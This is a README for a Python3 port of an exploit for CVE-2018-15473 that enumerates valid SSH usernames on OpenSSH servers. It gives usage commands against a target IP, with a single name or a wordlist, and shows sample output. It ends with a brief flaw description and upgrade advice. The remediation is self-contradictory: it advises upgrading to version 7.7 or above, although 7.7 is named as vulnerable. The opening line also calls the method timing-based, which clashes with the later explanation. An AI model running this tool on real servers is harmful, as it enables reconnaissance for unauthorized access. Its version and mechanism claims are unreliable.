
CVE-2018-15473에 대한 Python 익스플로잇으로, 인증 응답의 타이밍 차이를 이용하여 OpenSSH 서버(버전 2.3~7.7)에서 유효한 SSH 사용자 이름을 열거합니다.
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
수정된 원본 익스플로잇: https://www.exploit-db.com/exploits/45233
Python3로 변환됨
사용자 이름 워드리스트 옵션 추가됨
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
시스템은 유효한 인증 시도와 유효하지 않은 인증 시도에 대해 다른 응답을 보냅니다. 원격 사용자는 특수하게 조작된 요청을 보내 대상 시스템에서 유효한 사용자 이름을 식별할 수 있습니다. 따라서 원격 사용자가 대상 시스템의 유효한 사용자 이름을 알아낼 수 있습니다.
OpenSSH 서버를 버전 7.7 이상으로 업그레이드해야 합니다.